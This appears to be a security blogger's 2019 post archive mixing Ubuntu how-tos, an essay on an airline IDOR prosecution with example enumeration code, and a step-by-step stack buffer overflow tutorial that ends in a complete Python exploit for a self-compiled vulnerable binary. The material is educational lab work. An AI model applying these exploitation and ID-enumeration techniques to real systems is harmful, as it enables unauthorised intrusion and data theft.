Chief Editor's Time - The Hong Kong black-shirt and white-shirt incident
07242019 Current Affairs Observation, Part 1: 霍詠強 -- Restore the full picture and the truth speaks for itself
Open Source is a great idea and it has changed the world!
Open Source forever ....
If you do not know attack, how can you know defence? (未知攻,焉知防?)
Do BAD things .... for the RIGHT reasons -- OWASP ZAP
It is easier to port a shell than a shell script. -- Larry Wall
Most of you are familiar with the virtues of a programmer. There are three, of course: laziness, impatience, and hubris. -- Larry Wall
Establish a heart for heaven and earth, secure a livelihood for the people, carry on the lost teachings of the past sages, and open an age of peace for all generations. -- 王炜
Monday, July 29, 2019
Sunday, July 28, 2019
Longjing
Longjing is a deep-learning-driven web application firewall built on the Scikit-Learn library. The slides are available in PDF format.
sha256sum 116c66c8cb18b0cb280df0fc52425b250b17e231975f6dce50cc04fbcbbb5612 presentation-longjing.pdf
Download : presentation-longjing.pdf
That's all! See you.
Croissants
Croissants has been one of my open source projects since 2012. The slides are available in PDF format.
sha256sum 814e353abfa899aede7c6173a3dfd78b9aab0242258748f1e35073a87ff13f47 presentation-croissants.pdf
Download : presentation-croissants.pdf
That's all! See you.
Saturday, July 27, 2019
Mission Impossible?
This site is a scaled-down Damn Vulnerable Web Application (DVWA), which is designed for penetration testing practice. It is full of vulnerabilities, such as SQL injection (SQLi) and cross-site scripting (XSS). However, it sits behind my protection scheme and is considered secured. You are allowed to attack it in any form except DDoS and/or DoS. If anyone can hack or bypass it, please let me know: contact Samiux at freenode #infosec-ninjas.
Target : Infosec Projects.
Rule : You are allowed to attack it in any form except DDoS/DoS.
Remarks : Online time is limited.
Contact : Samiux at freenode #infosec-ninjas
That's all! See you.
Saturday, July 13, 2019
Miley Cyrus - The Backyard Sessions - "Jolene"
"Jolene"
(originally by Dolly Parton)
Jolene, Jolene, Jolene, Jolene
Oh, I'm begging of you please don't take my man
Jolene, Jolene, Jolene, Jolene
Please don't take him even though you can
Your beauty is beyond compare
With flaming locks of auburn hair
With ivory skin and eyes of emerald green
Your smile is like a breath of spring
Your skin is soft like summer rain
And I can not compete with you, Jolene
And I could easily understand
How you could easily take my man
But you don't know what he means to me, Jolene
He talks about you in his sleep
There's nothing I can do to keep
From crying, when he calls your name, Jolene, Jolene
Jolene, Jolene, Jolene, Jolene
Please don't take him even though you can
Jolene, Jolene, Jolene, Jolene
Please don't take him even though you can
I had to have this talk with you
My happiness depends on you
And whatever you decide to do, Jolene
And you could have your choice of men
But I could never love again
Cause he's the only one for me, Jolene, Jolene
Jolene, Jolene, Jolene, Jolene
Oh, I'm begging of you please don't take my man
Jolene, Jolene, Jolene, Jolene
Please don't take him even though you can
Jolene, Jolene...
Thursday, July 11, 2019
Sunday, July 07, 2019
Friday, July 05, 2019
A White Hat?!
On 29 October 2018, 27-year-old 陳子恩 (Chan) found that the boarding-pass URL of Hong Kong Airlines leaked sensitive data: an Insecure Direct Object Reference (IDOR) vulnerability that allowed other customers' records to be read at will. He claimed he had contacted Hong Kong Airlines to report the vulnerability but was not taken seriously, and so he disclosed it to the media.
The same day, the media contacted the company, and company staff found that Chan had read one customer's record without authorisation. The company reported it to the police at once. After investigation, Chan was charged with an offence under the Telecommunications Ordinance.
In court he argued that he had found a vulnerability which was ignored; had this happened abroad, or had he been treated as a white hat, he would have been rewarded, yet instead he was prosecuted, which he considered unfair and "judicial harassment". In the end, on 3 July 2019, Chan was found guilty and bound over on his own recognisance of HK$1,500 for one year.
Let us now analyse whether Chan broke the law and whether his defence holds up.
First, a white hat is an "ethical hacker" who performs penetration testing under written authorisation. If a so-called white hat performs penetration testing without written authorisation, he is breaking the law and is, by definition, a black hat. As for rewards: when a company or organisation runs or takes part in a bug bounty programme, every participant tests under written authorisation (the programme's terms), and a white hat who finds something receives the reward that is due.
So the crux is whether the penetration testing was done under written authorisation. In this case, Chan was not testing under written authorisation, so he broke the law, and the same holds in other countries.
Finally, in my personal opinion, Chan got off lightly. Please do not test the law yourselves. A reward is never guaranteed.
Samiux
OSCE OSCP OSWP
4 July 2019, Hong Kong, China
References
on.cc News (東網新聞)
Headline Daily (頭條新聞)
Wikipedia (維基百科)
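The vulnerability class at the centre of the post, shown as an added example in Python (this is not code from the post, from Hong Kong Airlines, or from any real booking system; every record, e-mail address, flight number and ID below is constructed for illustration): a boarding-pass lookup keyed by a sequential ID with no ownership check, next to the object-level authorization check that closes the hole.

```python
"""
Added example, not code from the post or from any airline's system: a
minimal model of the boarding-pass lookup flaw the post describes (an
Insecure Direct Object Reference) next to the object-level authorization
check that closes it. Every record, name and identifier is constructed.
"""
from collections import namedtuple

BoardingPass = namedtuple("BoardingPass", "pass_id owner passenger flight")

# Constructed sample data: records keyed by a sequential, guessable ID,
# which is exactly what ends up in a URL such as /boardingpass?id=1001.
PASSES = {
    1001: BoardingPass(1001, "alice@example.com", "A. Lee", "HX123"),
    1002: BoardingPass(1002, "bob@example.com", "B. Chan", "HX456"),
}


def lookup_vulnerable(pass_id):
    """IDOR: the only 'check' is that the ID exists. Whoever can count can
    walk the ID space and read every other customer's record."""
    return PASSES[pass_id]


def lookup_hardened(session_user, pass_id):
    """Object-level authorization: the record is returned only to its owner.
    The identity comes from the authenticated session, never from the URL,
    and 'not found' and 'not yours' give the same answer so the ID space
    cannot be mapped by probing."""
    record = PASSES.get(pass_id)
    if record is None or record.owner != session_user:
        raise PermissionError("boarding pass not found")
    return record


def enumerate_ids(lookup, start, count):
    """What a curious user does with a sequential ID: try the neighbouring
    IDs and keep the ones that hand back a record."""
    found = []
    for pass_id in range(start, start + count):
        try:
            lookup(pass_id)
        except (KeyError, PermissionError):
            continue
        found.append(pass_id)
    return found


if __name__ == "__main__":
    # Any caller against the vulnerable endpoint sees every record.
    print("vulnerable:", enumerate_ids(lookup_vulnerable, 1000, 5))
    # Alice against the hardened endpoint sees only her own.
    print("hardened:  ", enumerate_ids(
        lambda pid: lookup_hardened("alice@example.com", pid), 1000, 5))
```

Replacing the sequential ID with a random token makes guessing harder but is not a fix on its own; the ownership check against the session identity is what actually stops one customer from reading another's pass.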
Sunday, June 30, 2019
HOWTO : Upgrade Ubuntu 18.04.x LTS to 19.04 Directly
Upgrade Ubuntu 18.04.x LTS to 19.04 directly, without going through 18.10. Editing the apt sources by hand as below bypasses the checks that do-release-upgrade performs, so back up /etc/apt first, and run the upgrade from a local console (or inside tmux/screen), never over a bare SSH session: a dropped connection halfway through leaves packages half-configured.
sudo sed -i 's/Prompt\=lts/Prompt=normal/g' /etc/update-manager/release-upgrades
sudo sed -i 's/bionic/disco/g' /etc/apt/sources.list
sudo sed -i 's/bionic/disco/g' /etc/apt/sources.list.d/*.list
sudo sed -i 's/18\.04/19.04/g' /etc/apt/sources.list.d/*.list
sudo apt update
sudo apt upgrade
sudo apt dist-upgrade
sudo apt autoclean
sudo apt autoremove
That's all! See you.
Labels:
Ubuntu
Wednesday, June 26, 2019
Monday, June 24, 2019
Recon Me If You Can (2019)!
Reconnaissance (recon) is the most important phase in hacking. If you have insufficient information about the target, you cannot launch any attack on it.
Can your Intrusion Detection and Prevention System (IDPS), firewall, Unified Threat Management (UTM) appliance and the like keep your systems from being reconnoitred?
That's all! See you.
Labels:
Firewall,
IDPS,
Kali Linux,
UTM
Sunday, June 16, 2019
HOWTO : Solve the libssl1.1 Installation Problem On Ubuntu 18.04.2 LTS
Since the current version of libssl1.1 on Ubuntu 18.04.2 is 1.1.1, a previously installed 1.1.0 may cause problems when you upgrade or update the system. First check what dpkg knows about :
ls -l /var/lib/dpkg/info | grep -i libssl
When you see entries for both 1.1.0 and 1.1.1, do the following. Be aware that moving the dpkg info files makes dpkg forget which files the libssl package owns, so do not stop halfway: the dist-upgrade (or the reinstall in the update below) must complete before the box is in a consistent state.
sudo mv /var/lib/dpkg/info/libssl* /tmp
sudo apt-get update
sudo apt-get -y dist-upgrade
sudo apt-get -y autoclean
sudo apt-get -y autoremove
The problem should be solved.
That's all! See you.
UPDATE
Since Ubuntu has fixed the problem recently, you only need to reinstall the libssl1.1 package to restore the missing 1.1.0 files (on 18.04 the shared library ships in the package named libssl1.1 whichever upstream version it carries; the original command was missing the install verb) :
sudo apt-get install --reinstall -y libssl1.1
Monday, June 03, 2019
HOWTO : Install Keras On Nvidia Jetson Nano Developer Kit
To install JetPack 4.2 on Nvidia Jetson Nano Developer Kit, you need to follow this link.
Since JetPack 4.2 ships Ubuntu 18.04 rather than 18.04.2, Unity is installed by default. I prefer to uninstall Unity and get GNOME 3 back.
sudo apt update
sudo apt -y dist-upgrade
sudo apt remove unity-session unity
sudo apt install -y ubuntu-session gdm3 firefox gparted chrome-gnome-shell gnome-tweak-tool nano
sudo apt -y autoclean
sudo apt -y autoremove
Reboot the box.
If you have ownCloud :
sudo apt install -y owncloud-client
** The ownCloud client asks for the password every time the box boots.
To install Gnome Shell Extensions :
Harddisk LED to display the activity of the hard drive/SSD. It is recommended for this developer kit.
To set "Problem Reporting" to "Automatic" at "Privacy" of "Settings" in order to prevent unexpected popup windows.
To install Keras. Note that upgrading pip over the apt-installed copy with "sudo pip3 install -U pip" is known to break the /usr/bin/pip3 wrapper on Ubuntu 18.04 ("cannot import name main"); if that happens, invoke pip as "python3 -m pip" instead :
sudo apt-get install libhdf5-serial-dev hdf5-tools
sudo apt install -y python3-pip python3-dev python3-scipy
sudo apt-get install zlib1g-dev zip libjpeg8-dev libhdf5-dev
sudo pip3 install -U pip
sudo pip3 install -U numpy grpcio absl-py py-cpuinfo psutil portpicker six mock requests gast h5py astor termcolor
sudo pip3 install --extra-index-url https://developer.download.nvidia.com/compute/redist/jp/v42 tensorflow-gpu
sudo pip3 install -U keras
To test whether it works :
python3
>>> import keras
If there is no error message and it shows "Using TensorFlow backend.", it works. To quit :
>>> quit()
If you want to create swap file, you may need to use this resources.
That's all! See you.
Monday, May 20, 2019
A Change of Perspective - 楊和生 (Sang Young)
Everything has two sides. In the online world there are "black-hat hackers" who use the network for crime, and "white-hat hackers" who defend it; both know hacking techniques. Yet the greatest skill is not at the technical level but in reading human psychology. Blindly forwarding messages feeds the hackers' arrogance; with a sceptical attitude and the courage to question, no special skill is needed for any of us to stop a rumour.
Thursday, May 16, 2019
HOWTO : Exploit Education - Phoenix on Kali Linux Rolling
apt install qemu-system
wget https://github.com/ExploitEducation/Phoenix/releases/download/v1.0.0-alpha-3/exploit-education-phoenix-amd64-v1.0.0-alpha-3.tar.xz
tar -xJvf exploit-education-phoenix-amd64-v1.0.0-alpha-3.tar.xz
cd exploit-education-phoenix-amd64
chmod +x boot-exploit-education-phoenix-amd64.sh
To run the virtual machine :
./boot-exploit-education-phoenix-amd64.sh
Open another terminal :
ssh -p 2222 user@localhost
The password is "user".
Inside the virtual machine, go to :
cd /opt/phoenix
You can choose either "amd64" or "i486" to do the Phoenix exploits.
cd /opt/phoenix/amd64
or
cd /opt/phoenix/i486
That's all! See you.
Labels:
Exploit Education,
Phoenix
Thursday, May 09, 2019
Basic Buffer Overflow Exploit Made Easy
According to Wikipedia, a buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations.
When a buffer overflow occurs, an attacker can redirect execution to code of their choosing and may escalate privileges as a result.
I introduce a very simple way to develop a buffer overflow exploit; no complicated procedure is involved. The exploit development is done on 64-bit Kali Linux, against a 32-bit build of the program.
The following is the C source code of the "vuln.c" :
The "hacker" function is never called by the program. Our aim is to make it run anyway.
To compile the source to an executable :
gcc vuln.c -o vuln -fno-stack-protector -m32
If you cannot compile to 32-bit, install the following package :
apt install gcc-multilib
To make it simple, we disable the Address Space Layout Randomization (ASLR) :
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
In order to inspect the executable file, we need to download a tool namely "checksec.sh".
wget https://www.trapkit.de/tools/checksec.sh
Since the file has DOS (CRLF) line endings, convert it to Unix format and make it executable :
dos2unix checksec.sh
chmod +x checksec.sh
Run the following command and you will see that "NX" is enabled, i.e. the stack is not executable. That is why this exploit returns into a function that already exists in the binary instead of placing shellcode on the stack.
./checksec.sh --file vuln
To double check that the file is compiled as 32-bit :
file vuln
vuln: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=bc2907521e9842167e7544516653843949dabc9e, not stripped
When everything is alright, we run it to see how it works.
./vuln
What is your name?
samiux
Hey samiux, you're harmless, aren't you?
To see if we can crash it or not with 50 characters :
python -c 'print("A"*50)' > a.txt
cat a.txt | ./vuln
What is your name?
Hey AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, you're harmless, aren't you?
Segmentation fault
Okay, it does crash. Now we fire up gdb to do the exploit development :
gdb ./vuln
Feed in the junk characters.
(gdb) r < a.txt
The program crashes as expected.
We check the registers to see what happened.
(gdb) info registers
We notice that EIP is overwritten with 0x41414141 ("AAAA"). That means we control EIP, and once EIP is controlled we can run any code from that point, because EIP, the instruction pointer register, always holds the address of the next instruction to be executed.
Now we need to find out how many junk characters it takes to reach EIP. We use pattern_create.rb to create a unique, non-repeating pattern.
Open another terminal and run :
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 50 > b.txt
We feed the unique pattern to the program.
(gdb) r < b.txt
The program is crashed again as expected.
We check the registers again and find that EIP is overwritten with "0x41346241".
(gdb) info registers
We use pattern_offset.rb to find the offset. It is 42 in this case.
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 41346241
[*] Exact match at offset 42
According to the source code there are 3 functions: main, inSecure and hacker. Our aim is to run the hidden function "hacker", so we need to find its address.
(gdb) info functions
(gdb) disass hacker
We find that the address of the hacker function is "0x565561b9". This is a PIE binary (see the "file" output above) loaded at its fixed no-ASLR base: with ASLR on, or after a rebuild, the address changes, so always re-check it in gdb before reusing it.
Now the payload will be as follows :
42 bytes of "A" followed by the address of the hacker function, written as 4 little-endian bytes (b9 61 55 56)
The PoC Python code "poc.py" :
Exploit it now :
python poc.py | ./vuln
What is your name?
Hey AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�aUV, you're harmless, aren't you?
No, I'm a hacker!
Segmentation fault
The hidden hacker function runs as a result. The segmentation fault afterwards is expected: when hacker returns, it pops whatever bytes follow the overwritten return address on the stack and jumps there.
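The whole chain in one script, as an added example and not the post's own poc.py: it regenerates the Metasploit-style cyclic pattern in plain Python 3, recovers the offset 42 from the EIP value 0x41346241 that gdb reported, and emits the 46-byte payload with the hacker() address 0x565561b9 packed little-endian, which is the "\xb9aUV" visible at the end of the name in the output above. The offset and address are the values the post found for its build with ASLR disabled; they are assumptions for any other build.

```python
"""
Added example, not the post's own poc.py: the three steps the post performs
with pattern_create.rb, pattern_offset.rb and a hand-written PoC, done in
plain Python 3 so the numbers in the post can be reproduced without
Metasploit. The offset (42) and the address of hacker() (0x565561b9) are
the values the post found; the address is specific to that build with ASLR
disabled and must be re-checked in gdb for any other binary.
"""
import string
import struct
import sys


def pattern_create(length):
    """Same cyclic pattern as Metasploit's pattern_create.rb: a stream of
    3-byte groups Upper+lower+digit ("Aa0Aa1...Aa9Ab0..."), so every 4-byte
    window is unique within the first 20280 bytes."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip_value, length=20280):
    """Like pattern_offset.rb -q: gdb shows EIP as a little-endian integer,
    so pack it back into the byte order that sat on the stack and locate it
    in the pattern. Returns -1 if the value did not come from the pattern."""
    return pattern_create(length).find(struct.pack("<I", eip_value))


def build_payload(offset, target_addr):
    """Filler up to the saved return address, then the address of hacker()
    as 4 little-endian bytes (32-bit binary). 0x565561b9 becomes the bytes
    b9 61 55 56, i.e. "\\xb9aUV", which is the "aUV" seen in the output."""
    return b"A" * offset + struct.pack("<I", target_addr)


if __name__ == "__main__":
    # Usage: python3 poc.py | ./vuln
    # Raw bytes must go through sys.stdout.buffer; print() of a bytes object
    # under Python 3 would emit its repr (b'...'), not the bytes themselves.
    sys.stdout.buffer.write(build_payload(42, 0x565561B9))
```

Writing through sys.stdout.buffer is the one thing that differs from a Python 2 one-liner: Python 3's print() would turn the address bytes into their textual repr and the return address would never be hit.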
Bonus
To find the stack address where the return address was overwritten :
python -c 'print("A"*42 + "B"*4)' > c.txt
(gdb) r < c.txt
(gdb) info registers
(gdb) x/50xw $esp-100
EIP now reads 0x42424242 ("BBBB"), and the word in the memory dump that holds 0x42424242 is the stack slot where the saved return address lives; here it is 0xffffd32c.
Samiux
OSCE OSCP OSWP
May 9, 2019, Hong Kong, China
Labels:
Stack Overflows
Wednesday, May 08, 2019
Exploit Education - Phoenix (Stack Overflows)
Exploit Education was formerly Exploit Exercises. They have a series of exploit exercises. The new release is Phoenix, which covers the following topics :
- Network programming
- Stack overflows
- Format string vulnerabilities
- Heap overflows
I did the Stack overflows (i486) section recently. However, I cannot solve Stack Six as it is too difficult for me at the moment.
You can download the virtual machine here. The current image is v1.0.0-alpha-3, released on 16th January 2019.
To avoid spoilers, the exploit code is not shown in the video.
That's all! See you.
Labels:
Stack Overflows
Thursday, May 02, 2019
VulnHub - Stack Overflows for Beginners 1
Stack Overflows for Beginners 1 was created by Jack Barradell-Johns, a university student at the University of Sheffield. He developed this box for the university's Ethical Hacking Society.
There are 5 flags (including the root flag) to capture, all based on basic stack buffer overflows. The box is built on Kali Linux and is about 8 GB to download.
The first level is level0, and the username and password are both "level0".
To avoid spoilers, the flags and exploit code are not shown in the video.
Samiux
OSCE OSCP OSWP
May 2, 2019 Hong Kong, China
Labels:
Kali Linux,
VulnHub
Wednesday, April 24, 2019
HUAWEI MateBook X Pro on Ubuntu Desktop 18.04.2 LTS
CPU - Intel Core i7-8550U
RAM - 16GB LPDDR3
SSD - 512GB NVMe PCIe SSD
Thunderbolt 3 - USB Type C
Display - 13.9 inches LTPS Touchscreen (3,000 x 2,000) (260 PPI)
Graphics - NVIDIA GeForce MX150 plus the Intel HD Graphics on the CPU
F2 key - UEFI BIOS
F12 key - Boot list
This is the 2018 model. The 2019 model (HUAWEI MateBook X Pro New) is not available here at the moment.
If you want to update the BIOS, do it in the Windows 10 environment before installing Ubuntu: download the driver package and install the ".INF".
You can install Ubuntu Desktop 18.04.2 LTS on the HUAWEI MateBook X Pro without any problem whether "Secure Boot" is enabled or not. However, it cannot shut down or reboot properly until the NVIDIA display driver is installed.
Make sure "Problem Reporting" is set to "Automatic" under "Privacy" in "Settings" (top right-hand corner).
You may also need to install "net-tools" to see the settings of the network interfaces with ifconfig :
sudo apt install net-tools
nVidia Display Driver
You can install the NVIDIA proprietary display driver version 418 (not an open source driver) via the Ubuntu graphics-drivers PPA. VirtualBox 6.0.6 guest VMs require a newer NVIDIA driver: I tested with version 319, but the guest VM did not refresh properly near the mouse pointer.
sudo add-apt-repository ppa:graphics-drivers/ppa
sudo apt-get update
(if you have an older NVIDIA driver, remove it first; the glob is quoted so the shell does not expand it against files in the current directory)
sudo apt purge 'nvidia*'
sudo apt install nvidia-driver-418 nvidia-settings
GNOME Extensions
GNOME Extensions are very useful. I recommend installing the following for this laptop. First install the browser connector and Tweaks :
sudo apt install chrome-gnome-shell gnome-tweak-tool
Go to the "https://extensions.gnome.org/" to install extensions by clicking the "ON/OFF" button on the Extensions pages.
EasyScreenCast to record the screen in video format.
OpenWeather to see the current weather of your location.
CPUfreq to change the CPU between "powersave" or "performance" as well as "Turbo Boost".
VirtualBox Applet for easy access the VirtualBox virtual machines when VirtualBox is installed.
Extension Update Notifier to notify you about updates to extensions.
Caffeine to disable and enable the screen saver.
Clipboard Indicator to manage your copy and paste clipboard data.
Lock Keys to show the Num Lock and Caps Lock status.
Harddisk LED to display the activity of the hard drive/SSD.
That's all! See you.
Labels:
Gnome Shell Extension,
HUAWEI,
Ubuntu,
VirtualBox